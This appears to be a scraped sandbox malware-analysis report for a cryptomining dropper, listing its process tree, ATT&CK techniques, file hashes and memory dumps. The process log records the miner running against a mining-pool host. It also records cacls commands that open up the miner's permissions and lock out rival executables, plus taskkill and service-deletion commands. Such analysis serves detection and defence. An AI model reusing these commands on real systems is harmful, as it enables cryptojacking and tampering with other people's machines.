C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:2356

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:3384

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f
2⤵
PID:3004

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f
2⤵
PID:5088

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f
2⤵
PID:5084

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\SysWOW64\ftp.exe /e /t /g system:f
2⤵
PID:4800

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\system32\ftp.exe /e /t /g system:f
2⤵
PID:4752

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\SysWOW64\ftp.exe /e /t /g everyone:f
2⤵
PID:420

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\system32\ftp.exe /e /t /g everyone:f
2⤵
PID:4512

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\SysWOW64\ftp.exe /e /t /g everyone:f
2⤵
PID:3452

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls %systemroot%\system32\ftp.exe /e /t /g everyone:f
2⤵
PID:4740

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im cmd.exe
2⤵
PID:2820

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im cmd.exe
3⤵
- Kills process with taskkill
PID:4680

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f
2⤵
PID:3092

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f
2⤵
PID:2780

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f
3⤵
PID:1908

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f
2⤵
PID:4440

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f
3⤵
PID:420

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f
2⤵
PID:2904

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f
3⤵
PID:4884

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f
2⤵
PID:4100

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f
3⤵
PID:1556

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im cmd.exe
2⤵
PID:4724

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im cmd.exe
3⤵
- Kills process with taskkill
PID:3780

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:1064

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:5112

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f
2⤵
PID:864

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f
3⤵
PID:4168

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4324

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4592

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:5012

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:3192

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:4620

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:3164

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4612

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4800

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:4792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:4308

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4772

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:1560

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:1536

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:1440

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4560

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:3452

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f
2⤵
PID:4376

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f
3⤵
PID:2144

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:3768

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:60

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:3944

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:3580

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im cacls.exe
2⤵
PID:2056

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im cacls.exe
2⤵
PID:868

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im cacls.exe
3⤵
- Kills process with taskkill
PID:1288

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f
2⤵
PID:3240

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g system:f
3⤵
PID:4464

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f
2⤵
PID:3612

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g everyone:f
3⤵
PID:1556

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f
2⤵
PID:1964

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« CPUÊÍ·ÅÃû £« e /t /g system:f
3⤵
PID:4740

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe --donate-level 1 --max-cpu-usage 75 -o o.oooooooooo.ga:80 -u x.0802c -p x -k >C:\Users\Admin\AppData\Local\Temp\CPU_log.txt
2⤵
PID:4268

C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe --donate-level 1 --max-cpu-usage 75 -o o.oooooooooo.ga:80 -u x.0802c -p x -k
3⤵
- Executes dropped EXE
PID:1064

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f
2⤵
PID:4708

C:\Windows\SysWOW64\cacls.exe
cacls £« È¡ÌØ¶¨Ä¿Â¼ (11) £« sqlageatc.exe £« e /t /g everyone:f
3⤵
PID:4060

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:3284

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:920

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im cmd.exe
2⤵
PID:3456

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im cmd.exe
3⤵
- Kills process with taskkill
PID:4660

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f
2⤵
PID:3160

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlageatc.exe /e /t /g system:f
3⤵
PID:4312

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:1880

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:3128

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f
2⤵
PID:4944

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlageatc.exe /e /t /g system:f
3⤵
PID:4564

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4788

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:3552

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:4904

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:704

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:2348

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4460

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:4984

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:4924

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4968

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4432

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:4488

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:1560

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:4428

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:4744

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f
2⤵
PID:3308

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f
3⤵
PID:504

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
2⤵
PID:5104

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
3⤵
PID:684

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
2⤵
PID:3816

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:2260

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im cacls.exe
2⤵
PID:3956

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im cacls.exe
3⤵
- Kills process with taskkill
PID:3944

C:\Windows\SysWOW64\cacls.exe
Cacls rundlls.exe /t /e /c /d everyone
1⤵
PID:4220

C:\Windows\SysWOW64\cacls.exe
Cacls conhoy.exe /t /e /c /d everyone
1⤵
PID:4572

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im OmdBase.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4664

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Assemblies GthUdTask"
1⤵
PID:4388

C:\Windows\SysWOW64\sc.exe
sc delete "Corporati Assemblies BthUdTask"
1⤵
PID:2220

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4564

C:\Windows\SysWOW64\cacls.exe
Cacls OmdBase.exe /t /e /c /d everyone
1⤵
PID:4824

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlageatc.exe /t /g system:f
1⤵
PID:4220

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\ftp.exe /e /t /g system:f
1⤵
PID:4860

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\ftp.exe /e /t /g everyone:f
1⤵
PID:2336

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\ftp.exe /e /t /g system:f
1⤵
PID:4780

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\ftp.exe /e /t /g everyone:f
1⤵
PID:2284

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlageatc.exe /e /t /g everyone:f
1⤵
PID:3236

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

1

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\TempUpdate2.bat
MD5
e036a67c62e23322d319a434b21a1abb

SHA1
1f17415b94489df52bf42d044db6cee7f32d1a06

SHA256
ee0279ddc0d862fef6681266d6606610e48a75b24115978da5fce0be021a0bbe

SHA512
69d1af93a80a281666accb8f2053977e4292963b28ae827abaa9af10af2439a6e3da6f2ae9c613becbb19a6a174937129f251114daff91bace3855c385714f8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe
MD5
07fa3c66a034839654211fd61dd52db1

SHA1
7646835976eda269b3cb9deb8d699857f7d152e6

SHA256
d1d3d42b4251b323af26fd47b17d026f60091c8797713819d249c0560965477d

SHA512
be3f1d0afb5693c989f500079151febd7adcc004341da33ad4283fc078abb48d90766ef9d3e88648135a42d03991f216851b68aef4d47b45b30413f2c45d43b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe
MD5
07fa3c66a034839654211fd61dd52db1

SHA1
7646835976eda269b3cb9deb8d699857f7d152e6

SHA256
d1d3d42b4251b323af26fd47b17d026f60091c8797713819d249c0560965477d

SHA512
be3f1d0afb5693c989f500079151febd7adcc004341da33ad4283fc078abb48d90766ef9d3e88648135a42d03991f216851b68aef4d47b45b30413f2c45d43b3

Download Submit
memory/372-164-0x0000000000000000-mapping.dmp

Download
memory/400-128-0x0000000000000000-mapping.dmp

Download
memory/596-149-0x0000000000000000-mapping.dmp

Download
memory/704-156-0x0000000000000000-mapping.dmp

Download
memory/708-151-0x0000000000000000-mapping.dmp

Download
memory/708-117-0x0000000000000000-mapping.dmp

Download
memory/1016-162-0x0000000000000000-mapping.dmp

Download
memory/1064-184-0x000001887F950000-0x000001887F960000-memory.dmp

Filesize
64KB

Download
memory/1064-185-0x000001887F970000-0x000001887F990000-memory.dmp

Filesize
128KB

Download
memory/1064-186-0x000001887F990000-0x000001887F9B0000-memory.dmp

Filesize
128KB

Download
memory/1064-187-0x000001887F9B0000-0x000001887F9D0000-memory.dmp

Filesize
128KB

Download
memory/1140-131-0x0000000000000000-mapping.dmp

Download
memory/1196-159-0x0000000000000000-mapping.dmp

Download
memory/1200-127-0x0000000000000000-mapping.dmp

Download
memory/1228-132-0x0000000000000000-mapping.dmp

Download
memory/1240-160-0x0000000000000000-mapping.dmp

Download
memory/1300-180-0x0000000000000000-mapping.dmp

Download
memory/1304-150-0x0000000000000000-mapping.dmp

Download
memory/1428-133-0x0000000000000000-mapping.dmp

Download
memory/1428-167-0x0000000000000000-mapping.dmp

Download
memory/1692-141-0x0000000000000000-mapping.dmp

Download
memory/1696-129-0x0000000000000000-mapping.dmp

Download
memory/1780-135-0x0000000000000000-mapping.dmp

Download
memory/1812-178-0x0000000000000000-mapping.dmp

Download
memory/1812-145-0x0000000000000000-mapping.dmp

Download
memory/1988-169-0x0000000000000000-mapping.dmp

Download
memory/1988-136-0x0000000000000000-mapping.dmp

Download
memory/2028-170-0x0000000000000000-mapping.dmp

Download
memory/2144-168-0x0000000000000000-mapping.dmp

Download
memory/2164-137-0x0000000000000000-mapping.dmp

Download
memory/2236-176-0x0000000000000000-mapping.dmp

Download
memory/2288-165-0x0000000000000000-mapping.dmp

Download
memory/2456-171-0x0000000000000000-mapping.dmp

Download
memory/2468-143-0x0000000000000000-mapping.dmp

Download
memory/2496-118-0x00000000022C0000-0x00000000022CB000-memory.dmp

Filesize
44KB

Download
memory/2496-115-0x00000000022C0000-0x00000000022CB000-memory.dmp

Filesize
44KB

Download
memory/2640-138-0x0000000000000000-mapping.dmp

Download
memory/2760-152-0x0000000000000000-mapping.dmp

Download
memory/2764-157-0x0000000000000000-mapping.dmp

Download
memory/2820-175-0x0000000000000000-mapping.dmp

Download
memory/2856-147-0x0000000000000000-mapping.dmp

Download
memory/2868-134-0x0000000000000000-mapping.dmp

Download
memory/2868-166-0x0000000000000000-mapping.dmp

Download
memory/2972-142-0x0000000000000000-mapping.dmp

Download
memory/3004-158-0x0000000000000000-mapping.dmp

Download
memory/3036-139-0x0000000000000000-mapping.dmp

Download
memory/3036-173-0x0000000000000000-mapping.dmp

Download
memory/3136-144-0x0000000000000000-mapping.dmp

Download
memory/3180-161-0x0000000000000000-mapping.dmp

Download
memory/3188-130-0x0000000000000000-mapping.dmp

Download
memory/3192-121-0x0000000000000000-mapping.dmp

Download
memory/3204-120-0x0000000000000000-mapping.dmp

Download
memory/3240-163-0x0000000000000000-mapping.dmp

Download
memory/3252-140-0x0000000000000000-mapping.dmp

Download
memory/3284-126-0x0000000000000000-mapping.dmp

Download
memory/3336-125-0x0000000000000000-mapping.dmp

Download
memory/3348-155-0x0000000000000000-mapping.dmp

Download
memory/3416-116-0x0000000000000000-mapping.dmp

Download
memory/3488-122-0x0000000000000000-mapping.dmp

Download
memory/3504-148-0x0000000000000000-mapping.dmp

Download
memory/3652-174-0x0000000000000000-mapping.dmp

Download
memory/3808-123-0x0000000000000000-mapping.dmp

Download
memory/3820-146-0x0000000000000000-mapping.dmp

Download
memory/3824-119-0x0000000000000000-mapping.dmp

Download
memory/3828-154-0x0000000000000000-mapping.dmp

Download
memory/3832-177-0x0000000000000000-mapping.dmp

Download
memory/3836-179-0x0000000000000000-mapping.dmp

Download
memory/3964-172-0x0000000000000000-mapping.dmp

Download
memory/3996-124-0x0000000000000000-mapping.dmp

Download
memory/4064-153-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads